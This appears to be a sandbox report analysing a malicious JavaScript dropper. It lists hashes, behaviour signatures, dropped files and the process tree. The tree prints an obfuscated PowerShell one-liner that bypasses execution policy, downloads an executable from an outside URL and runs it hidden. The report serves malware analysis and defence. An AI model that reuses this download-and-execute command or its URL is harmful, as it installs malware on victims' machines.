Overview

overview

10

Static

static

4IW7erkj68.js

windows7_x64

10

4IW7erkj68.js

windows10_x64

10

Analysis

  • max time kernel
    17s
  • max time network
    110s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    18-01-2021 21:43

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4IW7erkj68.js

  • Size

    21KB

  • MD5

    ffff42a84871648a25ba2c39beca8d83

  • SHA1

    31acbb969b4b9d167f5ad4c78510ba2e8e0b4610

  • SHA256

    c03c5f7dabff34048550ffe1290d714291c554cdffa85da7116c3b675aadb458

  • SHA512

    b770666259807832786ee526c51ba18b59f80ba58a30d1ef892360bc88d71627674d341dea31f56221e821d072a67d1c62e82b3fd9b26338167046e3bcfdfe41

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://ixd1196.firebird.sheridanc.on.ca/cookies/custom.php

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\4IW7erkj68.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:812
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c pOwEr^shEll -ex^ecution^pol^icy b^ypa^ss -n^oprof^ile -w h^idd^en $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://ixd1196.firebird.sheridanc.on.ca/cookies/custom.php','%temp%VKF54.exe'); & %temp%VKF54.exe & BTHpwAoayRPbclY
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2788
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://ixd1196.firebird.sheridanc.on.ca/cookies/custom.php','C:\Users\Admin\AppData\Local\TempVKF54.exe');
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3708

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\TempVKF54.exe
    MD5

    2f5cded6abfe8576ea9ce3c91916efb3

    SHA1

    2e45ab8e29f1a10b9261df8f1567b26cfd24284c

    SHA256

    2883ba11d3ee1b2412ff15ad8378143ec66a9d6f9afeafafc7747c00f9530e15

    SHA512

    de54882d2fc436991c0a3ce01d23df979f627d3e6feb6099fea27c28959c9e55d0798b9a0f520f13873f5ecb172fb45c99ce20f07b2bc1b692a108b10fbfeb98

    Download Submit
  • memory/2788-2-0x0000000000000000-mapping.dmp
    Download
  • memory/3708-3-0x0000000000000000-mapping.dmp
    Download
  • memory/3708-4-0x00007FFB852D0000-0x00007FFB85CBC000-memory.dmp
    Filesize

    9.9MB

    Download
  • memory/3708-5-0x0000014C9E5E0000-0x0000014C9E5E1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3708-6-0x0000014C9E3F0000-0x0000014C9E3F2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3708-7-0x0000014C9E3F3000-0x0000014C9E3F5000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3708-8-0x0000014CB8BB0000-0x0000014CB8BB1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3708-9-0x0000014C9E3F6000-0x0000014C9E3F8000-memory.dmp
    Filesize

    8KB

    Download